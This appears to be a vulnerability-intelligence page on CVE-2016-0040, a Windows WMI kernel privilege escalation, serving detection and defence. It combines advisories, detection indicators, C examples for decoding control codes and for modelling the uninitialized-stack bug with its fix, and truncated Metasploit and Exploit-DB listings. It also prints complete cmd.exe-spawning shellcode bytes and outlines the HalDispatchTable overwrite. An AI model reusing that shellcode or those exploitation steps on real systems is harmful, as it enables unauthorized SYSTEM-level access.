CVE-2016-0040
Published 2016-02-10
Priority P1 (79) · CVSS 3.1 7.8 (high) · AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CISA Known Exploited Vulnerability (remediation due 2022-04-18) · Exploited in the wild · Public exploit available
EPSS 24.55% (97.6th percentile)
The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to gain privileges via a crafted application, aka "Windows Elevation of Privilege Vulnerability."
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
Detection & IOCs (extracted from sources)
IOCTL definition, as in the PoC source: IOCTL_WMI_RECEIVE_NOTIFICATIONS = CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS). 0x51 is the function number; the full 32-bit control code that a DeviceIoControl trace records is 0x00228144.
Shellcode bytes (the cmd.exe-spawning payload; note the trailing ASCII "cmd.exe"):
\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00
Detections:
- Monitor DeviceIoControl calls that target a WMIDataDevice handle with function number 0x51 (IOCTL_WMI_RECEIVE_NOTIFICATIONS, control code 0x00228144). This is the IOCTL that reaches the uninitialized stack variable in the WMI subsystem of ntoskrnl.
- Detect processes opening a handle to \\.\WMIDataDevice with GENERIC_READ | GENERIC_WRITE access from non-system, non-WMI processes, especially when a DeviceIoControl on that handle follows.
- The Metasploit module injects a DLL named CVE-2016-0040.x64.dll into a spawned notepad.exe process. Detect reflective DLL injection into notepad.exe, and the presence of this DLL name on disk or in memory.
- The exploit abuses an uninitialized stack variable in the WMI subsystem of ntoskrnl. Alert on unexpected kernel-mode code execution originating from the WMI receive-notification path on Windows 7 SP0/SP1 x64.
- The x86 PoC allocates executable memory at the fixed virtual address 0x2a000000 (VirtualAlloc with MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE). Detect fixed-address executable allocations at this address from user-mode processes.
- The x86 PoC calls ZwMapUserPhysicalPages (from NTDLL) to spray the kernel stack with a controlled value derived from HalDispatchTable. Monitor for unusual calls to ZwMapUserPhysicalPages from non-system processes.
- The x86 PoC's shellcode spawns cmd.exe by injecting into winlogon.exe via CreateRemoteThread. Detect CreateRemoteThread calls targeting winlogon.exe from unprivileged processes.
Caveats:
- The Metasploit module targets only Windows 7 SP0 and SP1 x64 builds; running it from a WOW64 session (32-bit process on a 64-bit OS) is not supported and will fail.
- The x86 PoC (EDB-40039) overwrites HaliSystemQueryInformation but does not restore it, so a BSOD will occur at some point after exploitation. An otherwise unexplained bugcheck following the indicators above helps distinguish attempted exploitation from normal activity.
- The Metasploit module requires an existing Meterpreter session and aborts if the session is already SYSTEM-level.
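Whatever source records the DeviceIoControl calls (a driver hook, an ETW consumer, a sandbox API trace), what it logs is the full 32-bit control code, not the bare function number 0x51 quoted in the indicator, so a detection has to encode or decode CTL_CODE before it can match. The following C program is an added example written for this page; it is not part of the PoC, the Metasploit module or any detection product. It reproduces the CTL_CODE bit layout from winioctl.h, derives 0x00228144 for IOCTL_WMI_RECEIVE_NOTIFICATIONS, and runs the indicator over a constructed sample of DeviceIoControl records. The record layout, the process allowlist and the sample records are assumptions made for the example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* CTL_CODE bit layout from winioctl.h, reproduced so this builds off Windows:
 * bits 31..16 device type, 15..14 required access, 13..2 function, 1..0 method. */
#define CTL_CODE(DeviceType, Function, Method, Access)                    \
    ((((uint32_t)(DeviceType)) << 16) | (((uint32_t)(Access)) << 14) |   \
     (((uint32_t)(Function)) << 2) | ((uint32_t)(Method)))
#define FILE_DEVICE_UNKNOWN 0x00000022
#define METHOD_BUFFERED     0
#define FILE_WRITE_ACCESS   0x0002

/* The indicator from the list above: function 0x51 on FILE_DEVICE_UNKNOWN, buffered, write access. */
#define IOCTL_WMI_RECEIVE_NOTIFICATIONS \
    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)

struct ioctl_parts { uint32_t device_type, access, function, method; };

/* Split a logged 32-bit control code back into its four fields. */
struct ioctl_parts decode_ctl_code(uint32_t code)
{
    struct ioctl_parts p;
    p.device_type = code >> 16;
    p.access      = (code >> 14) & 0x3;
    p.function    = (code >> 2) & 0xFFF;
    p.method      = code & 0x3;
    return p;
}

/* One DeviceIoControl record in the shape a hook or trace consumer would hand over
 * (assumed layout for this example). */
struct devio_event {
    const char *process;       /* image name of the caller */
    const char *device;        /* path the handle was opened on */
    uint32_t    control_code;  /* full 32-bit code as logged, not the bare 0x51 */
    int         system_caller; /* 1 if the caller already runs as SYSTEM */
};

static int ends_with_nocase(const char *s, const char *suffix)
{
    size_t ls = strlen(s), lx = strlen(suffix);
    if (lx > ls) return 0;
    for (size_t i = 0; i < lx; i++)
        if (tolower((unsigned char)s[ls - lx + i]) != tolower((unsigned char)suffix[i]))
            return 0;
    return 1;
}

/* Processes expected to talk to WMIDataDevice on a normal host (assumed allowlist; tune per estate). */
static const char *const expected_wmi_clients[] = { "WmiPrvSE.exe", "svchost.exe" };

static int is_expected_wmi_client(const char *process)
{
    for (size_t i = 0; i < sizeof expected_wmi_clients / sizeof expected_wmi_clients[0]; i++)
        if (ends_with_nocase(process, expected_wmi_clients[i])) return 1;
    return 0;
}

/* 1 when a non-SYSTEM, non-WMI process sends function 0x51 to a WMIDataDevice handle.
 * Matching on the decoded fields rather than the literal 0x228144 also catches a caller
 * that requests the same function with a different access mask. */
int matches_wmi_recv_indicator(const struct devio_event *e)
{
    struct ioctl_parts p = decode_ctl_code(e->control_code);
    if (!ends_with_nocase(e->device, "WMIDataDevice")) return 0;
    if (p.device_type != FILE_DEVICE_UNKNOWN || p.function != 0x51) return 0;
    if (e->system_caller || is_expected_wmi_client(e->process)) return 0;
    return 1;
}

size_t count_wmi_recv_hits(const struct devio_event *events, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += matches_wmi_recv_indicator(&events[i]) != 0;
    return hits;
}

/* Constructed sample trace: a WMI provider host, the Metasploit module's notepad.exe host
 * process, a neighbouring function number, and a PoC binary using a mixed-case path. */
static const struct devio_event sample_trace[] = {
    { "WmiPrvSE.exe", "\\\\.\\WMIDataDevice", IOCTL_WMI_RECEIVE_NOTIFICATIONS, 1 },
    { "notepad.exe",  "\\\\.\\WMIDataDevice", IOCTL_WMI_RECEIVE_NOTIFICATIONS, 0 },
    { "notepad.exe",  "\\\\.\\WMIDataDevice",
      CTL_CODE(FILE_DEVICE_UNKNOWN, 0x52, METHOD_BUFFERED, FILE_WRITE_ACCESS), 0 },
    { "poc.exe",      "\\\\.\\wmidatadevice", 0x00228144u, 0 },
};
static const size_t sample_trace_len = sizeof sample_trace / sizeof sample_trace[0];

int main(void)
{
    printf("IOCTL_WMI_RECEIVE_NOTIFICATIONS = 0x%08X\n", (unsigned)IOCTL_WMI_RECEIVE_NOTIFICATIONS);
    printf("suspect DeviceIoControl records: %zu of %zu\n",
           count_wmi_recv_hits(sample_trace, sample_trace_len), sample_trace_len);
    return 0;
}
```

The allowlist is the part to adjust: on a host where management agents query WMI directly, they will also open WMIDataDevice, so pair this with the handle-open and reflective-injection indicators above rather than alerting on the IOCTL alone.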
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |
| VulnCheck | — | 7.8 | HIGH | — |
| CISA | — | 7.8 | HIGH | — |
CISA
Microsoft Windows Kernel Privilege Escalation Vulnerability
cisa · 2022-03-28 · CVSS 7.8 · CWE-264
Vulnerability: Microsoft Windows Kernel Privilege Escalation Vulnerability
Affected: Microsoft Windows
The kernel in Microsoft Windows allows local users to gain privileges via a crafted application.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2016-0040
Remediation Due Date: 2022-04-18
VulDB
Microsoft Windows 7/Server 2008/Vista SP2 access control (MS16-014 / EDB-44586)
vuldb · 2026-04-23 · CVSS 7.8
A vulnerability marked as critical has been reported in Microsoft Windows 7/Server 2008/Vista SP2. An unknown functionality is affected; the manipulation leads to improper access controls.
This vulnerability is documented as CVE-2016-0040. The attack must be performed locally, and an exploit exists.
Applying the vendor patch is the recommended action to fix this issue.
GHSA
GHSA-hvmm-257f-6qw7
ghsa_unreviewed · 2022-05-14 · HIGH
The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows local users to gain privileges via a crafted application, aka "Windows Elevation of Privilege Vulnerability."
VulnCheck
Microsoft Windows Kernel Privilege Escalation Vulnerability
vulncheck · 2016 · CVSS 7.8 · CWE-264
The kernel in Microsoft Windows allows local users to gain privileges via a crafted application.
Affected: Microsoft Windows
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Exploit PoC: https://vulncheck.com/xdb/58efcffaec67
Remediation Due: 2022-04-18
No detection rules found.
Exploit-DB
Microsoft Windows WMI - Receive Notification Exploit (Metasploit)
exploitdb · 2018-05-04 · CVSS 7.8
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/windows/reflective_dll_injection'

# The class header, rank, mixins and the opening of initialize were lost when
# the listing was extracted (everything between "<" and the next ">" vanished);
# they are restored here from the standard Msf::Exploit::Local skeleton.
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Windows WMI Recieve Notification Exploit',
      'Description'    => %q(
        This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl.
        This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.
      ),
      'License'        => MSF_LICENSE,
      'Author'         => [
        'smmrootkit', # crash code
        'de7ec7ed',   # exploit code
        'de7ec7ed',   # msf module
      ],
      'Arch'           => [ARCH_X64],
      'Platform'       => 'win',
      'SessionTypes'   => ['meterpreter'],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread'
      },
      'Targets'        => [
        # (listing truncated by the source page)
Exploit-DB
Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)
exploitdb · 2016-06-29 · EDB-40039
---
/*
# Exploit Title: Elevation of privilege on Windows 7 SP1 x86
# Date: 28/06-2016
# Exploit Author: @blomster81
# Vendor Homepage: www.microsoft.com
# Version: Windows 7 SP1 x86
# Tested on: Windows 7 SP1 x86
# CVE : CVE-2016-0040 (the original header reads "2016-0400", a typo; MS16-014 fixes CVE-2016-0040)
MS16-014 EoP PoC created from
https://github.com/Rootkitsmm/cve-2016-0040/blob/master/poc.cc
Spawns CMD.exe with SYSTEM rights.
Overwrites HaliSystemQueryInformation but does not restore it, so a BSOD will occur at some point.
********* EDB Note *********
ntos.h is available here: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40039.zip
*/
#include "stdafx.h"
#include <Windows.h>  /* restored: the header name was lost in extraction, and HANDLE/ULONG64 below need it */
/* a second system header here, and one after "ntos.h", did not survive extraction */
#include "ntos.h"

typedef union {
    HANDLE  Handle;
    ULONG64 Handle64;
    /* (listing truncated by the source page) */
Metasploit
Windows WMI Receive Notification Exploit
metasploit
This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl. This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.
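The bug class named here, an uninitialized stack variable whose value an attacker fills in from a previous system call, is easier to reason about with a small model. The following C program is an added example for this page; it is a constructed model, not ntoskrnl code and not the module's DLL. A shared array stands in for the kernel stack region that consecutive calls reuse, a spray call leaves caller-chosen data in it (the x86 PoC does this with ZwMapUserPhysicalPages), and a handler then uses a local it only assigned on one path. The slot index, request structure and handler names are assumptions for the model; the hardened version beside it shows the two fixes that close the hole.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed model of a kernel stack region that successive system calls reuse.
 * Nothing zeroes a frame between calls, which is why a stack spray leaves
 * attacker-chosen bytes where the next callee's locals will live. */
#define KSTACK_SLOTS 32
static uint64_t kstack[KSTACK_SLOTS];

/* Step 1: a benign system call copies caller-controlled data into deep stack
 * locals and returns without clearing them. */
void spray_syscall(const uint64_t *user_values, size_t n)
{
    for (size_t i = 0; i < KSTACK_SLOTS; i++)
        kstack[i] = user_values[i % n];
}

/* Slot in which the handler's pointer local happens to live (assumed for the model). */
#define SLOT_TARGET_PTR 9

struct notify_request {
    int      has_buffer;   /* 1 if the caller supplied an output location */
    uint64_t buffer_addr;  /* where the handler should store the notification */
};

/* Vulnerable handler: the local is assigned on one path but used on every path.
 * Returns the address it would write through, so the effect can be observed. */
uint64_t handle_receive_vuln(const struct notify_request *req)
{
    uint64_t *target = &kstack[SLOT_TARGET_PTR];   /* declared, never initialised */
    if (req->has_buffer)
        *target = req->buffer_addr;
    /* has_buffer == 0: *target is whatever the previous call left in this slot */
    return *target;
}

/* Hardened handler: initialise every local before branching, and fail closed
 * when the input that would have set it is missing. */
int handle_receive_fixed(const struct notify_request *req, uint64_t *write_target)
{
    uint64_t *target = &kstack[SLOT_TARGET_PTR];
    *target = 0;
    if (!req->has_buffer)
        return -1;                 /* STATUS_INVALID_PARAMETER analogue */
    *target = req->buffer_addr;
    *write_target = *target;
    return 0;
}

/* The two-step sequence the exploit relies on: spray, then send a malformed
 * request that takes the path on which the local was never set. */
uint64_t demo_spray_then_trigger(uint64_t sprayed)
{
    spray_syscall(&sprayed, 1);
    struct notify_request bad = { 0, 0 };
    return handle_receive_vuln(&bad);
}

/* Same sequence against the hardened handler: the request is rejected. */
int demo_fixed_rejects_malformed(void)
{
    uint64_t sprayed = 0x4141414141414141ULL, out = 0;
    spray_syscall(&sprayed, 1);
    struct notify_request bad = { 0, 0 };
    return handle_receive_fixed(&bad, &out);
}

/* A well-formed request still works after the fix. */
uint64_t demo_fixed_accepts_valid(uint64_t addr)
{
    uint64_t out = 0;
    struct notify_request good = { 1, addr };
    return handle_receive_fixed(&good, &out) == 0 ? out : 0;
}

int main(void)
{
    printf("vulnerable handler would write through: 0x%016llx\n",
           (unsigned long long)demo_spray_then_trigger(0x4141414141414141ULL));
    printf("hardened handler on the same request: %d\n", demo_fixed_rejects_malformed());
    return 0;
}
```

In the real exploit the sprayed value is derived from HalDispatchTable, so the handler's stray write lands on the HaliSystemQueryInformation entry and a later NtQueryIntervalProfile call executes the attacker's code; the model stops at showing who controls the pointer.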
Checkpoint
Graphology of an Exploit – Hunting for exploits by looking for the author’s fingerprints
blogs_checkpoint · 2020-10-02 · primary CVE: CVE-2019-0859
Research by: Itay Cohen, Eyal Itkin
In the past months, our Vulnerability and Malware Research tea
Talos
Microsoft Patch Tuesday - February 2016
blogs_talos · 2016-02-09 · CVSS 7.8
Today, Microsoft has released their monthly set of security bulletins designed to address security vulnerabilities within their products. This month’s release contains twelve bulletins addressing 37 vulnerabilities. Five bulletins are rated critical and address vulnerabilities in Internet Explorer, Edge, Windows Journal, Office and Windows PDF. The remaining seven bulletins are rated important and address vulnerabilities in the Network Policy Server (NPS), Active Directory, Windows, Remote Desktop Protocol, WebDAV, Kernel Mode Driver and the .NET Framework.
## Bulletins Rated Critical
Microsoft bulletins MS16-009, MS16-011 through MS16-013, and MS16-015 are rated as critical in this month's release.
MS16-009 and MS16-011 are this month's Internet Explorer and Edge security bulletin resp
Zscaler
Zscaler found Multiple Security Vulnerabilities | 02-09-2016
blogs_zscaler · CVSS 8.8
arXiv
Static Detection of Uninitialized Stack Variables in Binary Code
arxiv_fulltext · 2020-07-05
Behrad Garmany, Martin Stoffel, Robert Gawlik, Thorsten Holz
Horst Görtz Institute for IT-Security (HGI), Ruhr-Universität Bochum, Germany
## Abstract
More than two decades after the first stack smashing attacks, memory
corruption vulnerabilities utilizing stack anomalies are still prevalent and
play an important role in practice. Among such vulnerabilities, uninitialized
variables play an exceptional role due to their unpleasant property of
unpredictability: as compilers are tailored to operate fast, costly
interprocedural analysis procedures are not used in practice to detect such
vulnerabilities. As a result, comple
References
http://www.securitytracker.com/id/1034985
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-014
https://www.exploit-db.com/exploits/44586/
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2016-0040
Timeline
2016-02-10 Published
2022-03-28 Added to CISA KEV (exploited in the wild)